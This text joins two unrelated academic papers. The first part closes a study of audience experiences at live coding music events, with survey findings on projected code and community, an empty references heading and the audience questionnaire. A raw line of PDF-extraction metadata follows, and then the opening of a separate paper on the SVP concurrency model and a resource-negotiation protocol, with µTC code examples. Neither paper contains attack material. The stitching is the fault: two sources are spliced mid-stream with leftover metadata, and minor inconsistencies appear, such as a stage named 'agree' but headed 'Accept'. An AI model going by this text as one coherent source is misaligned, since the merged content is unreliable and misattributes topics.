Seeing the projected code provides a connection between the performer and the audience; it provides opportunities to admire the performer (‘it’s like watching a top guitarist do his thing – but with a keyboard. A computer keyboard’ (P83)), to observe the performer’s commitment and emotional engagement (‘strange form of music performance that...represents the ‘suffering’ of the performers trying to produce something satisfying’ (P41)), and it provides opportunities for learning; for example, one respondent stated that she enjoyed ‘meeting interesting like-minded people and [learning] how different people make different noises with code’ (P6). There is frequent mention of the opportunities to ‘learn about new possibilities’ (P34) during live coding performances, and this highlights that, for the informed audience member, the chance to develop skills and to gain ‘inspiration/ideas for my own projects’ (P24) is a fundamental feature of the live experience of coded music (cf. Guzdial, 2013).

The community of ‘like-minded people’ (see P6 above) was also an important part of the audience experience. One of the questions in the survey asked respondents to describe a typical audience member and most responded with comments such as ‘geeky’, ‘nerds’, ‘open-minded and curious’ and ‘cool, polite and tidy’ (!). Perhaps more importantly, most respondents considered themselves to fit the typical profile ‘like a glove’ (apart from women and older respondents who jokingly acknowledged their atypicality in this context). It is possible that perceptions of an open and like-minded community encourage the possibility of sharing and learning and encourage subsequent attendance and future involvement in coding at home or as performers.

**Unique and unpredictable experiences**

Like audiences at jazz events (cf. Burland and Pitts, 2012), live coding audiences value the unpredictable nature of the events. Comments about ‘the geekery and haphazard nature of the performance’ (P8) and the ‘presence of the unexpected’ (P12) were frequent and relate in part to the technology involved: ‘[It] is really ‘live’, not a playback of prepared files. It can go wrong. It’s improvised. It’s bleeding edge technology’ (P21).
In many ways it is difficult to have expectations for the performances, other than that they might be unpredictable, and it is this which appeals to the audience members: ‘The unpredictability of live coding and generative music/visuals [is appealing], I don’t enjoy going to performances where I know what to expect (from myself and from other performers)’ (P43). The sense that the experience is unpredictable for performer and audience alike strengthens the sense of community described above, but also distinguishes what is special about live as opposed to recorded listening. There is a sense that audience and performer co-create the performance as the performer is able to react in real time to the feedback from the audience.

There is also unpredictability in the kind of music to expect at a live coding event; whilst the music sits comfortably within the context of EDM, it is a versatile style of music: ‘I like the style of music; although it’s a ‘bleeding edge’ form in the sense that many are doing stuff with networks, bespoke computer music languages, new controllers and the like, the music can often be quite happily rooted in genre: house, techno, noise, ambient and similar. It appeals to my taste’ (P81).

In trying to establish what the experience of live coding performance is like for its audiences, it is clear that the liveness of the music, and the unpredictability of the music and its technologies, contribute to the enjoyment of the event. However, this is enhanced by the broader context of being able ‘to witness the future of music’ (P50) or ‘the next big thing’ (P53).

**Experimental and new music**

There is frequent reference in the data to live coding being a new music which is constantly evolving and pushing the boundaries of live music performance. Part of the appeal is that performances provide opportunities to see ‘how live coders push the state of the art’ (P11) and ‘a new mechanism for expression being experimented with’ (P15). Interestingly, this is not just about a music in development, but also about the act of performance and ‘seeing a music movement in development, and the opportunities to open up that performer/audience barrier in new ways, which live coding affords’ (P45).

Obviously, the awareness of the originality or uniqueness of live coding relies on a certain contextual knowledge. Therefore, it is hardly surprising that the demographic of the audiences is as depicted above, nor that the respondents value and appreciate the technical aspects of the craft. There are parallels here, however, with audiences for other musics which can be seen as new or improvised – the work by Pitts and Gross (2015) with Contemporary Music/Art organisations also describes audiences as similarly open-minded about innovative artistic practices, and Burland’s work with free improvisers (Burland and Windsor, 2014) and jazz audiences (Burland and Pitts, 2012) also highlights the appeal of witnessing spontaneous music creation. Therefore, one suggestion is that audiences are attracted to musics where their involvement in the musical experience can potentially have an impact on the creation of the music in real time, but where there is some unpredictability about the extent to which that might be successful or not!

**Engaging with the code**

As previously discussed, one of the most significant differences between live coding events and other live performances is the presence of the projected code (or the ‘score’ for other musics).
Whilst engagement with the ‘score’ is not expected in other musics, here the code plays a vital role in the audience’s experience, and consequently live coding performances are enhanced by their multimodality.

**Multimodal experience: enjoyment vs. distraction**

For many individuals, the projected code enhances enjoyment of the event: ‘It’s cool. Curiosity to understand the code underneath the music is a fun experience. It’s something new, not really seen elsewhere. The changing of code as a visualisation seems to ‘fit’ the entire…’. The ‘unique aesthetic’ (P75) of the code also enhances the event in other ways, adding ‘intimacy to the performance that is different from traditional music: there is a more direct connection to what the performer is doing and thinking’ (P75).

Other individuals value the projected code because they do not perceive the music to be complex or engaging. For example, one respondent stated that ‘[The code] must be shown. If not I find these events to get boring quickly because the generated music usually has little change over time’ (P26) and another that ‘[The code is] very helpful for me to appreciate the event, especially when the musical quality is not up to my standards’ (P33). The multimodal experience created by the projected code serves to enhance appreciation of the experience and to provide another source of enjoyment.

For some participants the code, rather than the performer, is described as the focus of their attention: this contradicts Perera’s (2013) suggestion that ‘as with any performance, a live coding audience focuses their attention on the performer or ensemble. An algorave places the programmer–musician centre stage, as a traditional clubnight does a DJ’ (p.140). It is well reported in other contexts that being able to see a performer in close proximity enhances the live performance experience (cf. Burland & Pitts, 2012) and, in many ways, the code allows a musician to demonstrate ‘their playing technique through the act of performing, the projected code demonstrates visibly the craft of the live coder’ (P47) and therefore becomes a representation of the performer.

As stated in the previous section, the code adds interest to the music as it provides additional insights into how the music is being created. For example, respondents stated that ‘[the code] is a big part of what makes live coding such a uniquely interesting art form’ (P23), and that ‘[t]he code is very important to me. It shows what the performer tries to accomplish’ (P21). The projected code facilitates learning and makes the creative process more transparent; it therefore adds value and meaning, and is an important part of the craft of live coding performance.

However, the projected code was not always seen to contribute positively to the events. For example, some respondents suggested that the code had a negative impact on the overall atmosphere of an event: ‘I feel in the community there’s a real focus on deconstructing the code rather than dancing, which feels maybe detrimental for people who aren’t as invested in the coding aspect’ (P54). When the audience does not have a shared goal for their experience during a live performance, this can have a detrimental impact on individuals’ experiences.
For example, Burland & Pitts (2014) suggest that a sense of being surrounded by like-minded others enhances experiences of live music performances and that instances where this is not fulfilled can detract from the event and in some instances prevent future attendance. There are indications that this is also true in a live coding context: ‘people often default to staring at the projection. I think it’s better when there are multiple projections, or the projections are at weird angles or projected over the performer, so it’s there but as part of the immersion rather than a presentation to be read’ (P25). Therefore, opportunities to ensure the code is displayed on screens around the venue may enhance the overall atmosphere, as this allows movement away from a single locus of activity which might alienate a less knowledgeable audience member.

Other respondents found constant focus on the code to be difficult: ‘it’s a lot like the frets of a guitar: occasionally I peer at them, appreciate the technical skills, try to understand a bit, but mostly I can’t focus on it’ (P25). These factors, as well as some of the more negative presentational aspects, such as the font being ‘too small to be legible’ (P49), provide some support for Perera’s (2013) suggestion that the code is not always essential to the enjoyment of live coding performance. However, live coding performances often demand patience of their audiences and in such cases the code can be an asset: ‘One of the things with live coding is patience, as a set starts up it’s often quite sparse so the audience almost have to be patient with it. The projected code in some way negotiates that by showing that something is happening’ (P45). If the code takes on the role of ‘performer’ in live coding events, then the way in which it is accessible and visible becomes crucial in order for the audience to have an optimal experience.

**Audience expectations for live coding events**

In the same way that audiences for other kinds of events have expectations for events (cf. Burland & Pitts, 2012), audiences for live coding events have expectations for the quality of the code: the code has to connect with the aural experience (‘It is important for me to be able to relate the code to the outcome’ (P14)) and should complement the experience rather than monopolise it. For example, one participant stated: ‘Mostly I am annoyed by the visual display as it pulls the focus away from the human performers and the listening. And because projection is usually large, one is “pulled in” to read’ (P41). There is an obvious contradiction within the sample of respondents here; on the one hand the projected code is seen as an essential part of the live coding experience, but on the other it can be a source of frustration as it becomes a sole focus of attention.

Many of the participants enjoy the opportunity to learn from the projected code; their expectations for the code are high and there is disappointment when these are not met: ‘I am most interested when I can follow the coding process but disappointed when all the code is already written down and there is no real coding process to follow or no time to at least read the prepared code. Then I just focus on the music or visual result’ (P37). There is also an expectation for ‘algorithmic gymnastics’ (P80), which suggests that high levels of technical virtuosity are also required by some audience members.
There is a sense that the audience also expect some communication from the performers and observe that the code does facilitate this, although there is recognition that the presentation of the events still needs improvement: ‘I really enjoy seeing the projected code. I still think the community has a long way to go in terms of stagecraft while preserving the legibility of code’ (P11).

**Conclusions**

This paper aims to explore audience motivations to attend, and their experiences of, live coding events, examining in particular the role and impact of the source code and the visible creation of music in real time. The findings suggest that live coding events attract knowledgeable and informed audiences who want to have unpredictable, surprising and original experiences. In this respect, they share many characteristics with audiences for jazz and contemporary classical music (Burland & Pitts, 2012; Pitts & Gross, 2015). Live coding audiences share much excitement about the innovative and experimental nature of the music, which inspires them to attend events as frequently as possible, but also to make their own coded music at home (or publicly). However, live coding audiences are distinct in relation to the relatively narrow range of professions they represent, which focus largely on roles related to, or involving, technology. With this in mind, the transparency of the projected code is a strong appeal of these performances, which offer opportunities for learning and sharing new ideas. There is a clear sense of community associated with the events – audiences identify strongly with each other and feel that they are together contributing to the future face of the music.

The performances themselves seem to rely heavily on the multimodal experience – there are instances where either the code or the music is unsatisfactory, and in such cases the opportunity to appreciate one mode or the other is appealing. There is a call amongst the respondents here for the stagecraft of live coding performances to be improved – reports of illegible, incomprehensible or disappointing code were frequent – and stories of how the projected code can spoil the atmosphere of events need to be kept in mind.

Live coding performance is still relatively new and the openness of the field to constant challenge and evolution is refreshing, and it is this uncertainty which is undoubtedly appealing to its performers and audiences. Understanding the ways in which this music, which is sometimes challenging and impenetrable to those not in the know, manages to generate new and young audiences is extremely valuable as other forms of music and art face the constant threat of declining audiences. This paper has highlighted the ways in which audiences respond to the multimodal nature of live coded music and offers a starting point for future explorations of the ways in which audiences interact with, and experience, new and cutting edge music.

References

Appendix One: Audience Questionnaire

Information about you

1. Are you:
   [ ] 17 or under  [ ] 18-25  [ ] 26-35  [ ] 36-45  [ ] 46-55  [ ] 56-65  [ ] 66-75  [ ] 76 or over

2. What is your gender? ____________________

3. What is your current occupation? ____________________

Attending Live Coding Events

4. What are your main reasons for attending Live Coding Events? (Please tick all that apply)
   [ ] I have been before and enjoyed them.
   [ ] I like the style of music.
   [ ] I enjoy hearing live music of high quality.
   [ ] I am a coding enthusiast.
   [ ] I really like the artists who are performing.
   [ ] I am involved in performances at this or similar events.
   [ ] I wanted to try something new.
   [ ] I came with friends.
   [ ] Other (please give details): ____________________

5. How often do you attend Algoraves or Live Coding Events? ____________________

6. How do you decide which gigs to attend? (Please tick all that apply)
   [ ] The performer(s)
   [ ] Particular instruments
   [ ] Cost
   [ ] Venue
   [ ] My availability
   [ ] Friends’ availability
   [ ] General interest in the event
   [ ] Recommendation
   [ ] Other (please give details): ____________________

7. What appeals to you most about Live Coding Events?

8. To what extent do you engage with the projected code at these events?

9. What is the impact of the projected code on your experience of the event?

10. From your perceptions of other people attending these events, how would you describe a typical audience member?
    • Age and gender ____________________
    • Musical interests/experience ____________________
    • Likely occupation ____________________
    • Other characteristics ____________________

11. How closely do you fit the pattern you have described above?

12. What is your level of experience (if any) with computer programming?

Music in your life

13. How often do you attend live music events?
    [ ] once a week  [ ] several times a month  [ ] every so often  [ ] rarely

14. What types of music do you most often choose when attending live performances?

15. How often do you listen to recorded music?
    [ ] every day  [ ] several times a week  [ ] once a week  [ ] every so often  [ ] rarely  [ ] never

16. What kinds of music do you prefer when listening to recorded music?

17. To what extent is listening to music and attending gigs an important part of your life?

18. Are you involved in singing, playing or coding music yourself? If so, please give details.

19. Would you describe yourself as a musician? Please explain ...
{"Source-Url": "http://eprints.whiterose.ac.uk/109223/10/Burland_McLean_FINAL.pdf", "len_cl100k_base": 6752, "olmocr-version": "0.1.53", "pdf-total-pages": 14, "total-fallback-pages": 0, "total-input-tokens": 31097, "total-output-tokens": 8886, "length": "2e12", "weborganizer": {"__label__adult": 0.00231170654296875, "__label__art_design": 0.11993408203125, "__label__crime_law": 0.0015134811401367188, "__label__education_jobs": 0.044647216796875, "__label__entertainment": 0.059967041015625, "__label__fashion_beauty": 0.0013599395751953125, "__label__finance_business": 0.0026988983154296875, "__label__food_dining": 0.0029048919677734375, "__label__games": 0.0064697265625, "__label__hardware": 0.0040435791015625, "__label__health": 0.00295257568359375, "__label__history": 0.0009202957153320312, "__label__home_hobbies": 0.0011081695556640625, "__label__industrial": 0.0011186599731445312, "__label__literature": 0.008819580078125, "__label__politics": 0.0022907257080078125, "__label__religion": 0.002368927001953125, "__label__science_tech": 0.08880615234375, "__label__social_life": 0.0027599334716796875, "__label__software": 0.030426025390625, "__label__software_dev": 0.60791015625, "__label__sports_fitness": 0.00200653076171875, "__label__transportation": 0.0016880035400390625, "__label__travel": 0.0008587837219238281}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 37407, 0.02703]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 37407, 0.2125]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 37407, 0.93842]], "google_gemma-3-12b-it_contains_pii": [[0, 1576, false], [1576, 3642, null], [3642, 6569, null], [6569, 10013, null], [10013, 11553, null], [11553, 14528, null], [14528, 18092, null], [18092, 21393, null], [21393, 25132, null], [25132, 28558, null], [28558, 31609, null], [31609, 33993, null], [33993, 34607, null], [34607, 37407, null]], "google_gemma-3-12b-it_is_public_document": [[0, 1576, true], [1576, 3642, null], [3642, 6569, null], [6569, 10013, null], [10013, 11553, null], [11553, 14528, null], [14528, 18092, null], [18092, 21393, null], [21393, 25132, null], [25132, 28558, null], [28558, 31609, null], [31609, 33993, null], [33993, 34607, null], [34607, 37407, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 37407, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 37407, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 37407, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 37407, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 37407, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 37407, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 37407, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 37407, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 37407, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 37407, null]], "pdf_page_numbers": [[0, 1576, 1], [1576, 3642, 2], [3642, 6569, 3], [6569, 10013, 4], [10013, 11553, 5], [11553, 14528, 6], [14528, 18092, 7], [18092, 21393, 8], [21393, 25132, 9], [25132, 28558, 10], [28558, 31609, 11], [31609, 33993, 12], [33993, 34607, 13], [34607, 37407, 14]], 
"pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 37407, 0.0]]}
olmocr_science_pdfs
2024-12-07
2024-12-07
6945e7306d9d425432dd221d11a5af525e9f1c11
An architecture and protocol for the management of resources in ubiquitous and heterogeneous systems based on the SVP model of concurrency

Jesshope, C.R.; Philippe, J-M.; van Tol, M.W.

Published in: Lecture Notes in Computer Science
DOI: 10.1007/978-3-540-70550-5_25

An Architecture and Protocol for the Management of Resources in Ubiquitous and Heterogeneous Systems based on the SVP model of Concurrency

Chris Jesshope¹, Jean-Marc Philippe², and Michiel van Tol¹

¹ University of Amsterdam, Institute for Informatics, Kruislaan 403, Amsterdam 1098 SJ, Netherlands
² CEA LIST, DRT/DTSI/SARC/LCE, CEA-Saclay, Batiment 528 Point Courrier 94, F-91191 Gif sur Yvette Cedex, France
{jesshope,mwvantol}@science.uva.nl, jean-marc.philippe@cea.fr

Abstract. This paper proposes a novel hierarchical architecture and resource-management protocol for the delegation of work within a ubiquitous and heterogeneous environment. The protocol is based on serving SVP places to delegate a component of work together with the responsibility for meeting any non-functional computational requirements such as deadline or throughput constraints. The protocol is based on a market where SANE processors bid for jobs to execute and selection is based on a cost model that reflects the energy required to meet the job's requirements.

Key words: concurrency models, heterogeneous systems, resource management, market models, ubiquitous systems.

1 Introduction

As CMOS nodes continue to shrink, the complexity of embedded systems grows. This progress enables the manufacturing of low-power and low-cost consumer electronic devices able to communicate through wired or wireless technologies. Embedding computing power in everyday consumer products leads to the possibility of having systems comprising networks of thousands of nodes near each user. This will provide everyone with the possibility of processing data anywhere at any time, moving people into the pervasive computing era [1]. The design of such systems requires a dramatic shift at every level of the system, as neither software nor hardware platforms are ready to face the issues raised by this exciting new research challenge. These ubiquitous systems may comprise a huge number of heterogeneous computing elements and will evolve around the users, following their needs and habits. Thus, their optimisation will be highly dependent on their computing environment. Taking advantage of the huge computing power offered by this collaboration of elements will require the dynamic management of concurrency, including graceful degradation under conditions where computing elements may appear and disappear at will. This is a significant challenge.
Fig. 1. A generic SANE (which may itself be a collection of SANEs) responds to two protocols: one to perform work as families of threads, the other to serve resources to external threads. The latter uses negotiation between SANEs based on energy credits.

To solve these issues, a disruptive approach is being promoted in the ÆTHER European project³, which embeds self-adaptivity at each level of the system, giving autonomy to the components and enabling the application designer to concentrate on the application instead of having to cope with all possible events in the lifetime of a computing resource in such a rapidly evolving environment. For this purpose, we have introduced the SANE concept (Self-Adaptive Networked Entity). This views the system as a collection of self-adaptive elements (software, hardware or both) that can observe their environment and their internal performance so as to autonomously modify their behaviour in order to improve overall system performance. These elements collaborate with each other and share information and resources in order to provide a global optimisation based on local and autonomous behaviour.

This approach requires a new architecture and protocols to enable the dynamic sharing of resources and the consequent management of concurrency. The mechanism that enables this distributed sharing of resources is the delegation of responsibility for the execution of units of work, where that responsibility includes meeting performance constraints. We consider here a hierarchical cluster-based architecture, in which each cluster presents a uniform interface to its environment, defining it as a SANE processor (or cluster of SANEs); to be a SANE, it must support the SVP model (SANE Virtual Processor) [2], see Figure 1.

This paper describes the resource-management protocol that enables the delegation of work. SANEs are autonomous and from time to time may be given jobs to execute; a local user may submit a job, or one may be delegated from the SANE's environment. In the latter case, the SANE will have contracted with an external thread to run that job and to meet certain expectations in its execution, for example performance. The contract is negotiated using a credit exchange, where the cost of executing a job is initially assumed to be the energy expended by the contracted SANE, measured in Joules. The contracting thread, which may be acting on behalf of another SANE, transfers credit for the agreed amount of energy to execute the work on the contracted SANE. In response, the contracted SANE agrees to meet the deadlines or performance constraints imposed by the contracting SANE.

³ More details can be found on the project's web site: http://www.aether-ist.org/

2 The SVP model and its resources

SVP is a concurrency model that defines a number of actions to enable the execution and control of families of identical blocking threads. It is a hierarchical model, and any SVP thread may create subordinate families of threads. The family (and its subordinate families) is the unit of work that is delegated in a SANE system. Implementations of the SVP model have been demonstrated and evaluated in software [3], based on the pthread library, and in hardware [4], based on instructions added to the ISA of a many-core processor.
The SVP model is captured by the five actions listed below; their implementation defines the underlying protocol supporting the interfaces shown in Figure 1.

1. create - creates a family of indexed threads at a place, with parameters {start, step, limit} defining the index sequence. It is based on one thread definition and returns a family identifier that uniquely identifies that family for asynchronous control of its execution.
2. sync - blocks until the specified family of threads, and all of their writes to memory, have completed. It returns an exit code that identifies how the family terminated; in the case of break, it also returns a value from the breaking thread, and in the case of squeeze, it returns a family index value.
3. break - only one thread in a family can succeed in executing a break, which terminates its family and all subordinate families. It returns a break value, of a type specified by the thread definition, to the family's sync action.
4. kill - asynchronously terminates a specified family of threads and all its subordinate families.
5. squeeze - asynchronously terminates a specified family of threads and any user-specified subordinate families so that it can be restarted at the squeeze point, which is returned via each squeezed family's sync action.

SVP has two essential roles. At the hardware level, it captures locality and regularity, which are key factors in mapping a computation to a set of resources, whatever they are. The mapping defines wires or synchronisers to support blocking, and these must respond on a hardware timescale. Constraints in the SVP model capture this locality, which reflects the asynchrony and locality that will be required in future silicon systems. The model expresses this by constraining communication between blocking threads: the first child thread created may synchronise only with the parent thread, and every other created thread only with its predecessor thread in the family. The model, rather than the program, exposes this to the compiler so that it can statically map a computation onto hardware, using knowledge of the target implementation. Examples are compiling the language µTC to a multi-core ISA [5] and mapping and routing a family of SVP threads to FPGA hardware. Using novel self-adaptation techniques, these SVP hardware threads may be dynamically optimised using online routing [6]. In both cases, the implementation will be captured as one or more binary modules that support local communication.

SVP's second role captures the dynamic distribution of work between different implementations of the SVP model. This is achieved by binding an abstract resource to a unit of work on the creation of a family of threads. That resource abstraction is the SVP place, which is provided by a place server. An implementation of place provides a network address and a token for authentication when creating work there. For example, when a place is served, the address is used to implement the protocol in whatever network setting the SANE exists. More importantly, to avoid unauthorised use of a place, the place server gives both the place and the thread requesting it a token, which must be matched during the SVP create protocol. Figure 2 illustrates the events in this protocol. It should be noted that the create action in this role is a form of remote procedure call. The use of place as an abstraction allows the dynamic binding of resources to code when creating a family of threads.
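To make these two roles concrete, the following is a minimal µTC sketch of creating and synchronising on a family at a served place. The create-parameter order follows the convention used in the examples later in this paper, i.e. (family id; place; start; limit; step; block); the names served_place and do_work are illustrative assumptions, not taken from the paper.

```
/* Minimal sketch (assumed names): run a family of eight threads,
   indexed 0..7, at a place obtained from a place server. The place
   value embeds a network address and an authentication token that
   is matched during the create protocol. */
place served_place;
family f;
...
create(f;served_place;0;7;1;) do_work();  /* remote, RPC-like create */
sync(f);  /* blocks until every thread and its memory writes finish */
```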
The place also identifies a contract between two SANEs when delegating work, as illustrated in Figure 1, and hence it identifies a set of resources or virtual resources on which the work will be executed. This may be a partition of a multi-core chip, a domain in an FPGA chip that is dynamically configured to execute the family of threads, or even a processor or cluster of processors in a Grid. Each will have its own implementation of the SVP actions and tools to compile µTC into that implementation. To achieve this abstraction, every implementation of SVP must deal with two pre-defined places and with variables of type place:

– The local place is used to tell the SVP implementation that all threads in this family should be kept local to the creating thread, which may have different interpretations in different implementations.
– The default place is resource-naive and will be determined by the mapping and scheduling algorithms of the SANE implementation.
– A place variable has a meaning dependent on the specific implementation of SVP. It is set by a place server and used as a parameter of the create action.

The place concept is heavily overloaded: it identifies a contract between a thread and a SANE, which will specify a level of service; it also embeds an address and a security key, which are used in the implementation of the create action to delegate the work. Once a SANE receives some delegated work, locally that work becomes resource-naive and will be mapped and scheduled by the local mapping and scheduling threads (see Figure 1). These threads use the place to identify the contract negotiated and hence locate the specific execution constraints agreed to. They must then organise the work to meet the constraints of the contract.

3 Resource negotiation in SVP

The aim of SVP is to give a concurrency model that is as ubiquitous in its application as the sequential model. The two roles of SVP described above reflect a separation of concerns between algorithm design and concurrency engineering. Resource-naive SVP code is similar to the sequential model in that it has properties of determinism and deadlock freedom under composition. An SVP implementation is therefore free to map and schedule threads as it likes. However, when introducing resources via places, i.e. introducing concurrency engineering, it is necessary to introduce non-deterministic choice, to support broadcast, and to provide graceful degradation. All of these issues are discussed below before the resource-server protocol is presented.

**Mutual exclusion in SVP.** Non-deterministic choice is required to manage exclusivity of resource use in a distributed environment. The place server must offer its service to a number of client threads that all compete for the available resources. This is achieved in SVP by providing mutual exclusion at a place rather than in memory, which is asynchronous. A mutually exclusive place sequentialises concurrent requests to create a family of threads. As places abstract resources, this is just another overloading of the concept of place that can be mapped onto its implementation. For example, in the pthread implementation of SVP [3], a mutually exclusive place simply uses a mutex. In the ISA version of SVP [4], mutual exclusion in a single processor is implemented by class bits in the place variable and corresponding state in the processor. The state indicates whether an exclusive family of that class is currently executing and hence sequentialises create actions in any of the classes.
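As a concrete illustration, the µTC sketch below shows two competing creates being serialised by a mutually exclusive place. The place excl_place and the thread definition update_state are assumed names, and the class-bit mechanics are hidden behind the place abstraction.

```
/* Hedged sketch: 'excl_place' is assumed to have been served as a
   mutually exclusive place. The two creates below may be issued
   concurrently, but the place sequentialises them, so the two
   update_state families never execute at the same time. */
place excl_place;
family fa, fb;
...
create(fa;excl_place;0;0;1;) update_state();
create(fb;excl_place;0;0;1;) update_state();
sync(fa);
sync(fb);
```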
The resource-management protocol is called the SEP interface: a mutually exclusive place (the System Environment Place) at which external threads create the protocol's threads to request and obtain places for their exclusive use in the delegation of work.

**Broadcast in SVP.** Because SVP is a deterministic model, which does not include any communication primitives, broadcast in the model must be implemented as a create action to each of a number of known places. For example, if a SANE cluster comprised $n$ SANEs, where each SANE provided an SEP interface at a place, and these places were stored in the array SEP_cluster[n], then the µTC code below would broadcast a request to each SEP interface in the cluster. N.b. the create parameters are (family id; place; start; limit; step; block), followed by a thread definition. In this code, $n$ threads in family $fo$ are created locally, each of which creates an SEP_request at one SEP interface.

```
int n;
place SEP_cluster[n];
family fo;
...
create(fo;local;0;n-1;1;)
{
    family fi;
    index i;
    create(fi;SEP_cluster[i];0;0;1;) SEP_request(...);
    sync(fi);
}
sync(fo);
```

**Graceful degradation in SVP.** Now consider what happens to this code if one of the SANEs in the cluster suddenly drops out before completing the request. The code deadlocks, as one thread in family $fo$ will wait forever for its sync, and hence family $fo$ will never complete. One solution to this, and in general to any situation that requires graceful degradation, is a time-out on the create action, which allows family $fo$ to wait a finite time before it completes. This can be implemented using a time-out thread, which kills family $fo$ after a given time, as sketched below.
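A minimal sketch of such a time-out guard is given below. Here timer_wait is a hypothetical delay primitive (it is not one of the five SVP actions), and the sketch glosses over how the guard thread obtains the identifier of family fo; both are assumptions for illustration only.

```
/* Hedged sketch of the time-out thread described above. The guard
   runs concurrently with family fo and kills it once TIMEOUT has
   elapsed; if fo completes first, the guard itself is killed. */
family fo, f_guard;
...
create(f_guard;local;0;0;1;)
{
    timer_wait(TIMEOUT);  /* hypothetical blocking delay */
    kill(fo);             /* terminate fo and all its subordinates */
}
sync(fo);                 /* returns normally or with a killed exit code */
kill(f_guard);            /* cancel the guard if fo finished in time */
```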
4 Resource management protocol

The implementation of the resource-negotiation protocol in a SANE environment, like the SVP protocol over which it is implemented, is dependent on a SANE's level in its hierarchy. The generic protocol must provide for the requirements of systems at many different levels, from chip to board level and at many levels in a network hierarchy. The protocol comprises five stages: announce, request, bid, agree, delegate. Specific implementations may omit stages that are implicit in the design at that level. For example, the first stage requires a SANE processor to announce its capabilities to the rest of the system. In an on-chip environment, the capability of each SANE processor may be known a priori and this stage may be omitted. However, for a SANE processor at the board level attached to a network, or coming into range of a wireless network, this stage would be mandatory.

**Announce.** In the first stage of the protocol, a SANE joining a cluster announces its capabilities using a common format for defining both resource capabilities and requirements. The protocol uses the concept of a root SEP, which is not necessarily a single, fixed place but a place variable via which all resource negotiation takes place. The root SEP and its possible implementations are described in more detail in Section 5. On joining a network, some low-level communication protocol will first be established, and on top of that a protocol for implementing SVP. The latter will initialise the joining SANE with a place at which to initiate the SEP protocol; that place is the root SEP and is similar in concept to the router in a conventional network. The joining SANE announces its arrival by creating the SEP_announce thread at the root SEP. Only one parameter is required: a pointer to the record(s) defining its capabilities. Those capabilities are defined using a domained ID that defines a set of known functions on the network. The domained ID serves to identify the processing domain of the work (signal processing, image processing, etc.) and the particular function offered or required. The root SEP can filter any requests for resources by the capability requested and hence reduce the amount of communication required. It does not make sense, for example, to send a request based on image processing to a SANE that does not implement any image-processing algorithms. The capability is defined as a processing rate on this set of functions. Note that the domains may represent functions at various levels of granularity, i.e. from arithmetic operations to complex functions. This step is illustrated in the µTC code below. The SANE may also withdraw its capabilities from the pool using the SEP_withdraw thread. Of course, it may also be withdrawn in a less graceful manner!

```
place root_SEP;
family f_ann;
struct capability* my_capability;
...
create(f_ann;root_SEP;0;0;1;;) SEP_announce(my_capability);
```

Fig. 3. Remainder of the protocol, i.e. request, bid, agree and delegate, undertaken when a thread requires resources for a computation.

**Request.** Having announced itself to its environment, a SANE may now make or receive requests for resources. These requests are again made to the root SEP, which will in turn forward them to any SANE in the environment that is capable of meeting the request. A request is defined as a required performance on a given function but also includes an elapsed time for which the resources are required. A timeout is attached to each request, which is the validity of the invitation to tender from the contractor. The request and subsequent bids are identified by the family identifier of the thread created in making the request.

**Bid.** Each bid will provide the following: a yes/no answer to the request and, if yes, the overall cost of meeting the request, the time required to configure the resources, a lifetime (the provider will reserve these resources for this amount of time), the SEP to which agreement must be sent, and a limit on the time the provider is able to provide resources, which may be less than or greater than the elapsed time requested. The cost can be in any agreed units, but the use of energy allows the optimisation of the complete SANE system based on a (time, energy) couple. This step is given in µTC below and illustrated in Figure 3.

```
place root_SEP;
family f_req;
struct resource* my_request;
struct bid *my_bid, *good_bid;
...
create(f_req;root_SEP;0;0;1;;) SEP_request(my_request, my_bid);
```
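Before agreement, the requesting thread must pick from the returned bids. The fragment below is a hedged, C-style sketch (µTC extends C) of one plausible selection rule: the lowest energy cost among feasible bids. The field names next, feasible and cost, and the linked-list representation, are assumptions for illustration, not taken from the paper.

```
/* Hedged sketch: choose the cheapest feasible bid from the list
   returned by SEP_request. Field and variable names are illustrative. */
struct bid *b, *good_bid = NULL;
for (b = my_bid; b != NULL; b = b->next) {  /* assumed linked list */
    if (b->feasible &&
        (good_bid == NULL || b->cost < good_bid->cost))
        good_bid = b;                       /* lowest energy cost */
}
/* good_bid now identifies the provider to contract with. */
```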
**Accept.** When the thread requesting resources receives the list of bids, it will select one or more bids to meet its requirements and agree a contract with the provider. In response, the provider will return a place that defines the contracted resources. The family identifier of the initial request for resources identifies the contract. This stage is equivalent to signing the contract and, in a full market system, will result in a credit transfer from the requesting SANE to the providing SANE.

```
place root_SEP, work_place;
family f_req, f;
struct bid *my_bid, *good_bid;
...
create(f;good_bid->place;0;0;1;;) SEP_agree(f_req, work_place);
```

**Delegate.** All that is left to do when the work_place has been returned is to create the delegated work at that place and to signal the release of that place when that work is complete.

```
place root_SEP, work_place;
family f_req, f;
struct bid *my_bid, *good_bid;
...
create(f;work_place;;;;) my_work();
...
sync(f);
...
create(f;good_bid->place;0;0;1;;) SEP_release(work_place);
```

5 The root SEP

The root SEP is a conceptual place and admits many different implementations. It is, first and foremost, the place at which a SANE announces itself and to which it directs requests for resources. It is assumed that, directly or indirectly, all known SANEs in a cluster may be reached from this place. Two examples of its implementation are given below to illustrate the range of possibilities.

